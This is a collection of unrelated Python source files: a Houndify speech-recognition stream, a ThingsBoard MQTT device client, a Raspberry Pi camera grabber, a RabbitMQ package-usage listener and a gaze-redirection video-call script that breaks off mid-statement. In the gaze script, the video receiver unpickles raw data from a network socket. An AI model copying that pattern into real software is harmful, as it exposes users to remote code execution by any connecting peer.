HOUNDIFY_CLIENT_ID = os.environ['HOUNDIFY_CLIENT_ID']
HOUNDIFY_CLIENT_KEY = os.environ['HOUNDIFY_CLIENT_KEY']
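    # Both values must be present in the environment before this module is
    # imported, e.g. (placeholder values):
    #   export HOUNDIFY_CLIENT_ID=<your-client-id>
    #   export HOUNDIFY_CLIENT_KEY=<your-client-key>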
def __init__(self):
self.recognizer = sr.Recognizer()
self.microphone = sr.Microphone()
self.audio_queue = Queue()
def recognize_worker(self):
while True:
audio = self.audio_queue.get()
if audio is None: break
try:
print(self.recognizer.recognize_houndify(audio, client_id=MicrophoneStream.HOUNDIFY_CLIENT_ID, client_key=MicrophoneStream.HOUNDIFY_CLIENT_KEY))
except sr.UnknownValueError:
print('Unable to understand')
except sr.RequestError as e:
print("Could not request results from Houndify service; {0}".format(e))
self.audio_queue.task_done() # mark the audio processing job as completed in the queue
def listen(self):
# start a new thread to recognize audio, while this thread focuses on listening
recognize_thread = Thread(target=self.recognize_worker)
recognize_thread.daemon = True
recognize_thread.start()
with self.microphone as source:
self.recognizer.adjust_for_ambient_noise(source)
try:
while True: # repeatedly listen for phrases and put the resulting audio on the audio processing job queue
self.audio_queue.put(self.recognizer.listen(source))
except KeyboardInterrupt: # allow Ctrl + C to shut down the program
pass
self.audio_queue.join() # block until all current audio processing jobs are done
self.audio_queue.put(None) # tell the recognize_thread to stop
recognize_thread.join() # wait for the recognize_thread to actually stop
if __name__ == "__main__":
m = MicrophoneStream()
m.listen()
|
tb_device_mqtt.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import ssl
import time
from threading import RLock
from threading import Thread
import paho.mqtt.client as paho
from simplejson import dumps
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
log = logging.getLogger("tb_connection")
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
# pylint: disable=invalid-name
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, port=1883, token=None):
self._client = paho.Client()
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
# self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
# def _on_log(self, client, userdata, level, buf):
# if isinstance(buf, Exception):
# log.exception(buf)
# else:
# log.debug("%s - %s - %s - %s", client, userdata, level, buf)
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, result_code):
prev_level = log.level
log.setLevel("DEBUG")
log.debug("Disconnected client: %s, user data: %s, result code: %s", str(client), str(userdata), str(result_code))
log.setLevel(prev_level)
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
result_codes = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
if self.__connect_callback:
time.sleep(.05)
self.__connect_callback(client, userdata, flags, result_code, *extra_params)
if result_code == 0:
self.__is_connected = True
log.info("connection SUCCESS")
self._client.subscribe(ATTRIBUTES_TOPIC, qos=1)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", 1)
self._client.subscribe(RPC_REQUEST_TOPIC + '+')
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=1)
else:
if result_code in result_codes:
log.error("connection FAIL with error %s %s", result_code, result_codes[result_code])
else:
log.error("connection FAIL with unknown error")
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None, key_file=None, keepalive=60):
if tls:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
self._on_decoded_message(content, message)
def _on_decoded_message(self, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
if self.__device_sub_dict.get("*"):
for subscription_id in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][subscription_id])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for subscription in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][subscription])
for res in dict_results:
res(content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC+"/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=1, wait_for_publish=False):
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=1)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos not in (0, 1):
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=1):
if not isinstance(telemetry, list) and not (isinstance(telemetry, dict) and telemetry.get("ts") is not None):
telemetry = [telemetry]
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=1):
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for attribute in self.__device_sub_dict:
if self.__device_sub_dict[attribute].get(subscription_id):
del self.__device_sub_dict[attribute][subscription_id]
log.debug("Unsubscribed from %s, subscription id %i", attribute, subscription_id)
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to %s with id %i", key, self.__device_max_sub_id)
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(attr_request_number),  # use the id returned above so a concurrent request cannot change it before publishing
payload=dumps(msg),
qos=1)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, timestamp):
self.__timeout_queue.put({"ts": timestamp, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(None, TBTimeoutException("Timeout while waiting for a reply from ThingsBoard!"))
else:
time.sleep(0.01)
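# A minimal usage sketch (illustrative only, not part of the original module); the
# host and access token below are placeholders:
#   client = TBDeviceMqttClient("thingsboard.example.com", token="DEVICE_ACCESS_TOKEN")
#   client.connect()
#   client.send_telemetry({"temperature": 21.5}).get()  # TBPublishInfo.get() blocks until published
#   client.send_attributes({"firmware_version": "1.0.0"})
#   client.subscribe_to_all_attributes(lambda content, error: print(content))
#   client.stop()
#   client.disconnect()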
|
camera_pi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
#
#
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (960, 720)
camera.hflip = True
camera.vflip = True
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there haven't been any clients asking for frames in
# the last 10 seconds, stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
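# Usage sketch (illustrative, not part of the original module): get_frame() lazily
# starts the background capture thread and returns the latest JPEG-encoded frame as
# bytes, e.g. to save a single snapshot:
#   camera = Camera()
#   with open("snapshot.jpg", "wb") as f:
#       f.write(camera.get_frame())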
|
listen.py
|
import os
import sys
import json
import time
import argparse
import threading
import collections
import pika
from rez.config import config
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", action="count")
parser.add_argument("--file")
parser.add_argument("--save-interval", default=2, type=int)
opts = parser.parse_args()
# Dictionary with..
# - host: {
# - user: [{
# - qualifiedPackageName
# - lastUsed
# - firstUsed
# }]
# }
history = collections.defaultdict(lambda: collections.defaultdict(dict))
state = {"updated": False, "running": True}
if opts.file:
fname = os.path.expanduser(opts.file)
fname = os.path.abspath(fname)
fname = os.path.normpath(fname)
try:
with open(fname) as f:
history = json.load(f)
except OSError:
# Clean slate
pass
def update_db():
"""Update output every so often, but not on every message"""
while True:
if not state["running"]:
break
if state["updated"]:
state["updated"] = False
with open(fname, "w") as f:
json.dump(history, f, indent=2, sort_keys=True)
if opts.verbose:
print("Updated '%s'" % opts.file)
time.sleep(opts.save_interval)
def on_resolve(ch, method, properties, body):
payload = json.loads(body)
try:
context = payload["context"]
except KeyError:
return sys.stderr.write(" [x] Unexpected message: %s\n" % body)
host = history[payload["host"]]
user = host[payload["user"]]
for pkg in context["resolved_packages"]:
name = "{name}-{version}".format(**pkg["variables"])
timestamp = context["timestamp"]
if name not in user:
user[name] = {
"firstUsed": timestamp,
}
user[name]["lastUsed"] = timestamp
state["updated"] = True
if not opts.file:
print(json.dumps(payload, indent=2, sort_keys=True))
if opts.verbose:
packages = history[payload["host"]][payload["user"]]
for name, stats in packages.items():
print("%s [%s, %s]" % (name,
stats["firstUsed"],
stats["lastUsed"]))
print("")
host = config.context_tracking_host
param = pika.ConnectionParameters(host=host)
connection = pika.BlockingConnection(param)
channel = connection.channel()
channel.basic_consume(queue='myqueue',
on_message_callback=on_resolve,
auto_ack=True)
if opts.file:
print(' [*] Saving messages to %s' % fname)
thread = threading.Thread(target=update_db)
thread.daemon = True
thread.start()
try:
print(' [*] Listening for context resolves @ %s' % host)
channel.start_consuming()
except KeyboardInterrupt:
state["running"] = False
print("Graceful shutdown")
|
regz_socket_MP_FD.py
|
# coding: utf-8
# # load package and settings
# In[ ]:
import cv2
import sys
import dlib
import time
import socket
import struct
import numpy as np
import tensorflow as tf
# from win32api import GetSystemMetrics
# import win32gui
from threading import Thread, Lock
import multiprocessing as mp
from config import get_config
import pickle
import math
# In[ ]:
conf,_ = get_config()
if conf.mod == 'flx':
import flx as model
else:
sys.exit("Wrong Model selection: flx or deepwarp")
# system parameters
model_dir = './'+conf.weight_set+'/warping_model/'+conf.mod+'/'+ str(conf.ef_dim) + '/'
size_video = [640,480]
# fps = 0
P_IDP = 5
depth = -50
# for monitoring
# environment parameter
Rs = (1400,900)
# In[ ]:
model_dir
print(Rs)
# In[ ]:
# video receiver
class video_receiver:
def __init__(self,shared_v,lock):
self.close = False
self.video_recv = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print('Socket created')
# global remote_head_Center
self.video_recv.bind(('',conf.recver_port))
self.video_recv.listen(10)
print('Socket now listening')
self.conn, self.addr=self.video_recv.accept()
# face detection
self.detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor("./lm_feat/shape_predictor_68_face_landmarks.dat")
self.face_detect_size = [320,240]
self.x_ratio = size_video[0]/self.face_detect_size[0]
self.y_ratio = size_video[1]/self.face_detect_size[1]
self.start_recv(shared_v,lock)
def face_detection(self,frame,shared_v,lock):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_detect_gray = cv2.resize(gray,(self.face_detect_size[0],self.face_detect_size[1]))
detections = self.detector(face_detect_gray, 0)
coor_remote_head_center=[0,0]
for k,bx in enumerate(detections):
coor_remote_head_center = [int((bx.left()+bx.right())*self.x_ratio/2),
int((bx.top()+bx.bottom())*self.y_ratio/2)]
break
# share the remote participant's head-center coordinates with the main process
lock.acquire()
shared_v[0] = coor_remote_head_center[0]
shared_v[1] = coor_remote_head_center[1]
lock.release()
def start_recv(self,shared_v,lock):
data = b""
payload_size = struct.calcsize("L")
print("payload_size: {}".format(payload_size))
while True:
while len(data) < payload_size:
data += self.conn.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_msg_size)[0]
while len(data) < msg_size:
data += self.conn.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
if frame == 'stop':
print('stop')
cv2.destroyWindow("Remote")
break
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
# face detection
self.video_recv_hd_thread = Thread(target=self.face_detection, args=(frame,shared_v,lock))
self.video_recv_hd_thread.start()
cv2.imshow('Remote',frame)
cv2.waitKey(1)
# # Flx-gaze
# In[ ]:
class gaze_redirection_system:
def __init__(self,shared_v,lock):
#Landmark identifier. Set the filename to whatever you named the downloaded file
self.detector = dlib.get_frontal_face_detector()
self.predictor = dlib.shape_predictor("./lm_feat/shape_predictor_68_face_landmarks.dat")
self.size_df = (320,240)
self.size_I = (48,64)
# initial value
self.Rw = [0,0]
self.Pe_z = -60
#### get configurations
self.f = conf.f
self.Ps = (conf.S_W,conf.S_H)
self.Pc = (conf.P_c_x,conf.P_c_y,conf.P_c_z)
self.Pe = [self.Pc[0],self.Pc[1],self.Pe_z] # H,V,D
## start video sender
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.client_socket.connect((conf.tar_ip, conf.sender_port))
self.encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),90]
# load model to gpu
print("Loading model of [L] eye to GPU")
with tf.Graph().as_default() as g:
# define placeholder for inputs to network
with tf.name_scope('inputs'):
self.LE_input_img = tf.placeholder(tf.float32, [None, conf.height, conf.width, conf.channel], name="input_img")
self.LE_input_fp = tf.placeholder(tf.float32, [None, conf.height, conf.width,conf.ef_dim], name="input_fp")
self.LE_input_ang = tf.placeholder(tf.float32, [None, conf.agl_dim], name="input_ang")
self.LE_phase_train = tf.placeholder(tf.bool, name='phase_train') # a bool for batch_normalization
self.LE_img_pred, _, _ = model.inference(self.LE_input_img, self.LE_input_fp, self.LE_input_ang, self.LE_phase_train, conf)
# split model here
self.L_sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,log_device_placement=False), graph = g)
# load model
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(model_dir+'L/')
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(self.L_sess, ckpt.model_checkpoint_path)
else:
print('No checkpoint file found')
print("Loading model of [R] eye to GPU")
with tf.Graph().as_default() as g2:
# define placeholder for inputs to network
with tf.name_scope('inputs'):
self.RE_input_img = tf.placeholder(tf.float32, [None, conf.height, conf.width, conf.channel], name="input_img")
self.RE_input_fp = tf.placeholder(tf.float32, [None, conf.height, conf.width,conf.ef_dim], name="input_fp")
self.RE_input_ang = tf.placeholder(tf.float32, [None, conf.agl_dim], name="input_ang")
self.RE_phase_train = tf.placeholder(tf.bool, name='phase_train') # a bool for batch_normalization
self.RE_img_pred, _, _ = model.inference(self.RE_input_img, self.RE_input_fp, self.RE_input_ang, self.RE_phase_train, conf)
# split model here
self.R_sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,log_device_placement=False), graph = g2)
# load model
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(model_dir+'R/')
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(self.R_sess, ckpt.model_checkpoint_path)
else:
print('No checkpoint file found')
self.run(shared_v,lock)
def monitor_para(self,frame,fig_alpha,fig_eye_pos,fig_R_w):
cv2.rectangle(frame,
(size_video[0]-150,0),(size_video[0],55),
(255,255,255),-1
)
cv2.putText(frame,
'Eye:['+str(int(fig_eye_pos[0])) +','+str(int(fig_eye_pos[1]))+','+str(int(fig_eye_pos[2]))+']',
(size_video[0]-140,15), cv2.FONT_HERSHEY_SIMPLEX, 0.4,(0,0,255),1,cv2.LINE_AA)
cv2.putText(frame,
'alpha:[V='+str(int(fig_alpha[0])) + ',H='+ str(int(fig_alpha[1]))+']',
(size_video[0]-140,30),cv2.FONT_HERSHEY_SIMPLEX,0.4,(0,0,255),1,cv2.LINE_AA)
cv2.putText(frame,
'R_w:['+str(int(fig_R_w[0])) + ','+ str(int(fig_R_w[1]))+']',
(size_video[0]-140,45),cv2.FONT_HERSHEY_SIMPLEX,0.4,(0,0,255),1,cv2.LINE_AA)
return frame
def get_inputs(self, frame, shape, pos = "L", size_I = [48,64]):
if(pos == "R"):
lc = 36
rc = 39
FP_seq = [36,37,38,39,40,41]
elif(pos == "L"):
lc = 42
rc = 45
FP_seq = [45,44,43,42,47,46]
else:
print("Error: Wrong Eye")
eye_cx = (shape.part(rc).x+shape.part(lc).x)*0.5
eye_cy = (shape.part(rc).y+shape.part(lc).y)*0.5
eye_center = [eye_cx, eye_cy]
eye_len = np.absolute(shape.part(rc).x - shape.part(lc).x)
bx_d5w = eye_len*3/4
bx_h = 1.5*bx_d5w
sft_up = bx_h*7/12
sft_low = bx_h*5/12
img_eye = frame[int(eye_cy-sft_up):int(eye_cy+sft_low),int(eye_cx-bx_d5w):int(eye_cx+bx_d5w)]
ori_size = [img_eye.shape[0],img_eye.shape[1]]
LT_coor = [int(eye_cy-sft_up), int(eye_cx-bx_d5w)] # (y,x)
img_eye = cv2.resize(img_eye, (size_I[1],size_I[0]))
# create anchor maps
ach_map = []
for i,d in enumerate(FP_seq):
resize_x = int((shape.part(d).x-LT_coor[1])*size_I[1]/ori_size[1])
resize_y = int((shape.part(d).y-LT_coor[0])*size_I[0]/ori_size[0])
# y
ach_map_y = np.expand_dims(np.expand_dims(np.arange(0, size_I[0]) - resize_y, axis=1), axis=2)
ach_map_y = np.tile(ach_map_y, [1,size_I[1],1])
# x
ach_map_x = np.expand_dims(np.expand_dims(np.arange(0, size_I[1]) - resize_x, axis=0), axis=2)
ach_map_x = np.tile(ach_map_x, [size_I[0],1,1])
if (i ==0):
ach_map = np.concatenate((ach_map_x, ach_map_y), axis=2)
else:
ach_map = np.concatenate((ach_map, ach_map_x, ach_map_y), axis=2)
return img_eye/255, ach_map, eye_center, ori_size, LT_coor
def shifting_angles_estimator(self, R_le, R_re,shared_v,lock):
# get P_w
try:
# note: the win32gui import is commented out at the top of this file, so this
# lookup raises NameError and execution falls back to the fixed geometry below
tar_win = win32gui.FindWindow(None, "Remote")
# left, top, right, bottom
Rw_lt = win32gui.GetWindowRect(tar_win)
size_window = (Rw_lt[2]-Rw_lt[0], Rw_lt[3]-Rw_lt[1])
except:
# size_window must be assigned before it is used to build the fallback Rw_lt
size_window = (659,528)
Rw_lt = [int(Rs[0])-int(size_window[0]/2),int(Rs[1])-int(size_window[1]/2)]
print("Missing the window")
# get pos head
pos_remote_head = [int(size_window[0]/2),int(size_window[1]/2)]
try:
if ((shared_v[0] !=0) & (shared_v[1] !=0)):
pos_remote_head[0] = shared_v[0]
pos_remote_head[1] = shared_v[1]
except:
pos_remote_head = (int(size_window[0]/2),int(size_window[1]/2))
R_w = (Rw_lt[0]+pos_remote_head[0], Rw_lt[1]+pos_remote_head[1])
Pw = (self.Ps[0]*(R_w[0]-Rs[0]/2)/Rs[0], self.Ps[1]*(R_w[1]-Rs[1]/2)/Rs[1], 0)
# get Pe
self.Pe[2] = -(self.f*conf.P_IDP)/np.sqrt((R_le[0]-R_re[0])**2 + (R_le[1]-R_re[1])**2)
# x-axis needs flip
self.Pe[0] = -np.abs(self.Pe[2])*(R_le[0]+R_re[0]-size_video[0])/(2*self.f) + self.Pc[0]
self.Pe[1] = np.abs(self.Pe[2])*(R_le[1]+R_re[1]-size_video[1])/(2*self.f) + self.Pc[1]
# calculate alpha
a_w2z_x = math.degrees(math.atan( (Pw[0]-self.Pe[0])/(Pw[2]-self.Pe[2])))
a_w2z_y = math.degrees(math.atan( (Pw[1]-self.Pe[1])/(Pw[2]-self.Pe[2])))
a_z2c_x = math.degrees(math.atan( (self.Pe[0]-self.Pc[0])/(self.Pc[2]-self.Pe[2])))
a_z2c_y = math.degrees(math.atan( (self.Pe[1]-self.Pc[1])/(self.Pc[2]-self.Pe[2])))
alpha = [int(a_w2z_y + a_z2c_y),int(a_w2z_x + a_z2c_x)] # (V,H)
return alpha, self.Pe, R_w
def flx_gaze(self, frame, gray, detections, shared_v, lock, pixel_cut=[3,4], size_I = [48,64]):
alpha_w2c = [0,0]
x_ratio = size_video[0]/self.size_df[0]
y_ratio = size_video[1]/self.size_df[1]
LE_M_A=[]
RE_M_A=[]
p_e=[0,0]
R_w=[0,0]
for k,bx in enumerate(detections):
# Get facial landmarks
time_start = time.time()
target_bx = dlib.rectangle(left=int(bx.left()*x_ratio),right =int(bx.right()*x_ratio),
top =int(bx.top()*y_ratio), bottom=int(bx.bottom()*y_ratio))
shape = self.predictor(gray, target_bx)
# get eye
LE_img, LE_M_A, LE_center, size_le_ori, R_le_LT = self.get_inputs(frame, shape, pos="L", size_I=size_I)
RE_img, RE_M_A, RE_center, size_re_ori, R_re_LT = self.get_inputs(frame, shape, pos="R", size_I=size_I)
# shifting angles estimator
alpha_w2c, p_e, R_w = self.shifting_angles_estimator(LE_center,RE_center,shared_v,lock)
time_get_eye = time.time() - time_start
# gaze manipulation
time_start = time.time()
# gaze redirection
# left Eye
LE_infer_img = self.L_sess.run(self.LE_img_pred, feed_dict= {
self.LE_input_img: np.expand_dims(LE_img, axis = 0),
self.LE_input_fp: np.expand_dims(LE_M_A, axis = 0),
self.LE_input_ang: np.expand_dims(alpha_w2c, axis = 0),
self.LE_phase_train: False
})
LE_infer = cv2.resize(LE_infer_img.reshape(size_I[0],size_I[1],3), (size_le_ori[1], size_le_ori[0]))
# right Eye
RE_infer_img = self.R_sess.run(self.RE_img_pred, feed_dict= {
self.RE_input_img: np.expand_dims(RE_img, axis = 0),
self.RE_input_fp: np.expand_dims(RE_M_A, axis = 0),
self.RE_input_ang: np.expand_dims(alpha_w2c, axis = 0),
self.RE_phase_train: False
})
RE_infer = cv2.resize(RE_infer_img.reshape(size_I[0],size_I[1],3), (size_re_ori[1], size_re_ori[0]))
# replace eyes
frame[(R_le_LT[0]+pixel_cut[0]):(R_le_LT[0]+size_le_ori[0]-pixel_cut[0]),
(R_le_LT[1]+pixel_cut[1]):(R_le_LT[1]+size_le_ori[1]-pixel_cut[1])] = LE_infer[pixel_cut[0]:(-1*pixel_cut[0]), pixel_cut[1]:-1*(pixel_cut[1])]*255
frame[(R_re_LT[0]+pixel_cut[0]):(R_re_LT[0]+size_re_ori[0]-pixel_cut[0]),
(R_re_LT[1]+pixel_cut[1]):(R_re_LT[1]+size_re_ori[1]-pixel_cut[1])] = RE_infer[pixel_cut[0]:(-1*pixel_cut[0]), pixel_cut[1]:-1*(pixel_cut[1])]*255
frame = self.monitor_para(frame, alpha_w2c, self.Pe, R_w)
result, imgencode = cv2.imencode('.jpg', frame, self.encode_param)
data = pickle.dumps(imgencode, 0)
self.client_socket.sendall(struct.pack("L", len(data)) + data)
return True
def redirect_gaze(self, frame,shared_v,lock):
# head detection
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_detect_gray = cv2.resize(gray,(self.size_df[0],self.size_df[1]))
detections = self.detector(face_detect_gray, 0)
rg_thread = Thread(target=self.flx_gaze, args=(frame, gray, detections,shared_v,lock))
rg_thread.start()
return True
def run(self,shared_v,lock):
# def main():
redir = False
size_window = [659,528]
vs = cv2.VideoCapture(1)
vs.set(3, size_video[0])
vs.set(4, size_video[1])
t = time.time()
cv2.namedWindow(conf.uid)
cv2.moveWindow(conf.uid, int(Rs[0]/2)-int(size_window[0]/2), int(Rs[1]/2)-int(size_window[1]/2))
while 1:
ret, recv_frame = vs.read()
if ret:
cv2.imshow(conf.uid,recv_frame)
if recv_frame is not None:
# redirected gaze
if redir:
frame = recv_frame.copy()
try:
tag = self.redirect_gaze(frame,shared_v,lock)
except:
pass
else:
result, imgencode = cv2.imencode('.jpg', recv_frame, self.encode_param)
